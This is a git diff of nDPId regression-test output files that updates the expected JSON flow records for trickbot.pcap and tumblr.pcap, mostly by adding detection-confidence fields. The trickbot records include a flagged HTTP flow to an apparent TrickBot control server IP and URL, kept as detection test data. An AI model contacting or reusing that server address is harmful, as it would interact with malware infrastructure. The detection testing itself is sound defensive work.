+01105{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1609266107551,"flow_last_seen":1609266107797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":349,"flow_tot_l4_payload_len":349,"flow_avg_l4_payload_len":87,"midstream":0,"ts_msec":1609266107797,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"82.118.225.196","url":"82.118.225.196:7080\/OK21pqJAtyyGBEo00sk","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident\/7.0; .NET4.0C; .NET4.0E)"}}
+01241{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1609266107551,"flow_last_seen":1609266108728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1358,"flow_tot_l4_payload_len":2635,"flow_avg_l4_payload_len":329,"midstream":0,"ts_msec":1609266108728,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"82.118.225.196","url":"82.118.225.196:7080\/OK21pqJAtyyGBEo00sk","code":200,"content_type":"text\/html","user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident\/7.0; .NET4.0C; .NET4.0E)"}}
+01039{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":74,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":74,"flow_first_seen":1609266107551,"flow_last_seen":1609266115947,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":57990,"flow_avg_l4_payload_len":783,"midstream":0,"ts_msec":1609266115947,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
 00156{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":74,"source":"trickbot.pcap","alias":"nDPId-test","total-events-serialized":9}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 74/74
@@ -15,10 +15,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4597162 bytes
-~~ total memory freed........: 4597162 bytes
-~~ total allocations/frees...: 99632/99632
+~~ total memory allocated....: 4682115 bytes
+~~ total memory freed........: 4682115 bytes
+~~ total allocations/frees...: 101222/101222
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 161 chars
-~~ json string max len.......: 975 chars
-~~ json string avg len.......: 623 chars
+~~ json string max len.......: 1246 chars
+~~ json string avg len.......: 747 chars
diff --git a/test/results/tumblr.pcap.out b/test/results/tumblr.pcap.out
index 58777903c..923b34f76 100644
--- a/test/results/tumblr.pcap.out
+++ b/test/results/tumblr.pcap.out
@@ -22,8 +22,8 @@
 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292104650,"flow_last_seen":1605292104650,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292104650,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1605292104650,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605292104650,"pkt":"qtsDr8lk5EKm5WPyht1gBEqMACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABo9CrI3c4Bu\/+MQoWdXXNVgBAB9YSyAAABAQgKTYTpp8Lc6wE="}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1605292104716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605292104716,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAGj0KsgqAcsBIEmLB5kd7IUo3\/YpAbvdzp1dc1X\/jEKGgBAMSBTRAAABAQgKwt2b\/U1+nj4="}
-00631{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":57,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292103810,"flow_last_seen":1605292105112,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12081,"flow_avg_l4_payload_len":377,"midstream":1,"ts_msec":1605292105112,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292103810,"flow_last_seen":1605292105112,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12081,"flow_avg_l4_payload_len":377,"midstream":1,"ts_msec":1605292105112,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":57,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292103810,"flow_last_seen":1605292105112,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12081,"flow_avg_l4_payload_len":377,"midstream":1,"ts_msec":1605292105112,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292103810,"flow_last_seen":1605292105112,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12081,"flow_avg_l4_payload_len":377,"midstream":1,"ts_msec":1605292105112,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105170,"flow_last_seen":1605292105170,"flow_idle_time":7440000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"ts_msec":1605292105170,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1605292105170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":246,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":246,"pkt_l4_len":192,"ts_msec":1605292105170,"pkt":"qtsDr8lk5EKm5WPyht1gDdvHAMAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqZwBuzRq\/HZTRuvUgBgSELhfAAABAQgKdG+lysLdLW8XAwMAm7+VUv5v3n1cEKhvA7Obmk7hW69laavu9OZNOdP5v2aiE9LYEKQeHffn7vm6VstuW5LB+GPd1bdCCYxPrQ8cpXXvSrRBde7Ubgvulsw\/eGF6vJKgoYXL5h04lY18ojPm\/cV9tUPretg64t\/hG52\/jXKkQ9+5e1GR1KuJgn1MWQ\/97vN82J\/Jt388ivkqQMfP0T\/jvMqs33Elwytq"}
 00692{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1605292105170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":237,"pkt_l4_len":183,"ts_msec":1605292105170,"pkt":"qtsDr8lk5EKm5WPyht1gDdvHALcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqZwBuzRq\/RZTRuvUgBgSEKKhAAABAQgKdG+ly8LdLW8XAwMAazorJ+v8Qql\/1vWfAai2gkZCI3DTL5oADrcU2MSE9kWZdYS8Jqpk4fHfL5KS3jLCf57oTjL53SDsaGk+gIvtoan6S0MuUK39MyCSYP90lEM7cfvMMDv9MYZwBU7ADMu7jSPLRoIxvW6l0Cl8FwMDACLudklu9KmRe2M4B\/MpTRVuBpiUQvjz3VbQML7h4xLHHM4W"}
@@ -34,42 +34,42 @@
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1605292105195,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605292105195,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAMAATSgqAcsBIEmLB5kd7IUo3\/YpAbupnFNG69Q0av0WgBAMvoDtAAABAQgKwt2d3XRvpco="}
 00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105197,"flow_last_seen":1605292105197,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605292105197,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1605292105197,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605292105197,"pkt":"qtsDr8lk5EKm5WPyht1gCsuaACgGQCoBywEgSYsHmR3shSjf9ikmBigAATUVWiO6Cyol\/xIt5AwBu6fu9OYAAAAAoAL9IHL6AAACBAWgBAIIClFT82IAAAAAAQMDBw=="}
-00632{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":128,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105170,"flow_last_seen":1605292105221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12369,"flow_avg_l4_payload_len":386,"midstream":1,"ts_msec":1605292105221,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105170,"flow_last_seen":1605292105221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12369,"flow_avg_l4_payload_len":386,"midstream":1,"ts_msec":1605292105221,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":128,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105170,"flow_last_seen":1605292105221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12369,"flow_avg_l4_payload_len":386,"midstream":1,"ts_msec":1605292105221,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105170,"flow_last_seen":1605292105221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12369,"flow_avg_l4_payload_len":386,"midstream":1,"ts_msec":1605292105221,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1605292105230,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605292105230,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYGKAABNRVaI7oLKiX\/Ei0qAcsBIEmLB5kd7IUo3\/YpAbvkDMLhfl2n7vTnoBJXgHalAAACBAV4AQMDAwQCCArC3Z3zUVPzYg=="}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1605292105230,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605292105230,"pkt":"qtsDr8lk5EKm5WPyht1gCsuaACAGQCoBywEgSYsHmR3shSjf9ikmBigAATUVWiO6Cyol\/xIt5AwBu6fu9OfC4X5egBAB+\/qVAAABAQgKUVPzg8LdnfM="}
-00922{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105197,"flow_last_seen":1605292105231,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605292105231,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00632{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":158,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105171,"flow_last_seen":1605292105231,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":17162,"flow_avg_l4_payload_len":536,"midstream":1,"ts_msec":1605292105231,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105171,"flow_last_seen":1605292105231,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":17162,"flow_avg_l4_payload_len":536,"midstream":1,"ts_msec":1605292105231,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105197,"flow_last_seen":1605292105231,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605292105231,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":158,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105171,"flow_last_seen":1605292105231,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":17162,"flow_avg_l4_payload_len":536,"midstream":1,"ts_msec":1605292105231,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105171,"flow_last_seen":1605292105231,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":17162,"flow_avg_l4_payload_len":536,"midstream":1,"ts_msec":1605292105231,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00621{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105274,"flow_last_seen":1605292105274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605292105274,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1605292105274,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605292105274,"pkt":"qtsDr8lk5EKm5WPyht1gA8c5ACgGQCoBywEgSYsHmR3shSjf9ikmBigAATUVWiO6Cyol\/xIt5A4Bu+LGvZYAAAAAoAL9IG8jAAACBAWgBAIIClFT868AAAAAAQMDBw=="}
-00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":369,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292105197,"flow_last_seen":1605292105278,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":102,"midstream":0,"ts_msec":1605292105278,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00987{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":369,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292105197,"flow_last_seen":1605292105278,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":102,"midstream":0,"ts_msec":1605292105278,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1605292105299,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605292105299,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYGKAABNRVaI7oLKiX\/Ei0qAcsBIEmLB5kd7IUo3\/YpAbvkDobnvZrixr2XoBJXgG87AAACBAV4AQMDAwQCCArC3Z5DUVPzrw=="}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1605292105299,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605292105299,"pkt":"qtsDr8lk5EKm5WPyht1gA8c5ACAGQCoBywEgSYsHmR3shSjf9ikmBigAATUVWiO6Cyol\/xIt5A4Bu+LGvZeG572bgBAB+\/MzAAABAQgKUVPzyMLdnkM="}
-00922{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105274,"flow_last_seen":1605292105299,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605292105299,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
